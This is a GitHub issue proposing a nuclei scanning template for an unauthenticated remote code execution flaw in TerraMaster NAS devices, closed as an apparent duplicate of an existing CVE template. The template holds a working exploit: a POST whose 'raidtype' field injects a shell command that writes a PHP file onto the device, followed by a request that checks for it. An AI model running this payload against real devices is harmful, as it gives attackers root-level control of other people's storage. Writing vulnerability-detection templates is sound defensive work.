search

projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License
9.04k stars 2.59k forks source link

TerraMaster-RCE #7895

Closed momika233 closed 1 year ago

momika233 commented 1 year ago

Template Information:

Can an attacker exploit vulnerable endpoints "api.php? "mobile/webNasIPS" exposes sensitive information such as administrator password hashes and MAC addresses. This would result in an attacker being able to achieve unauthenticated access. In addition, an attacker can also use another vulnerable endpoint "api.php? mobile/createRaid" and POST parameters "raidtype" and "diskstring" execute remote code as root on TerraMaster NAS devices.

Nuclei Template:

id: TerraMaster-RCE

info:
  name: TerraMaster NAS 4.2.x < 4.2.30
  author: momika233
  severity: high
  description: Can an attacker exploit vulnerable endpoints "api.php? "mobile/webNasIPS" exposes sensitive information such as administrator password hashes and MAC addresses. This would result in an attacker being able to achieve unauthenticated access. In addition, an attacker can also use another vulnerable endpoint "api.php? mobile/createRaid" and POST parameters "raidtype" and "diskstring" execute remote code as root on TerraMaster NAS devices.
  reference:
    - https://www.exploit-db.com/exploits/50635
  metadata:
    fofa-qeury: "TerraMaster"
    veified: true
    max-request: 2

  tags: TerraMaster-NAS,RCE

requests:
  - raw:
      - |
        POST /module/api.php?mobile/createRaid HTTP/1.1
        Host: {{Hostname}}
        User-Agent: TNAS
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close
        Authorization: $1$a8HTkWlu$3SwnF1UFzWRy04O/rpMg0/
        Signature: 06a1e2bf6a758050651c8897845468dd
        Timestamp: 1690190727
        Content-Length: 82
        Content-Type: application/x-www-form-urlencoded

        raidtype=%3Becho+%22%3C%3Fphp+phpinfo%28%29%3B%3F%3E%22%3Emomika233.php&diskstring=XXXX
      - |
        GET /module/momika233.php HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<title>phpinfo()"
        part: body

      - type: status
        status:
          - 200
DhiyaneshGeek commented 1 year ago

Hi @momika233 this seems to be duplicate of this http/cves/2022/CVE-2022-24990.yaml, Let me know if i'm wrong

Looking forward to hear back from you :)

momika233 commented 1 year ago

o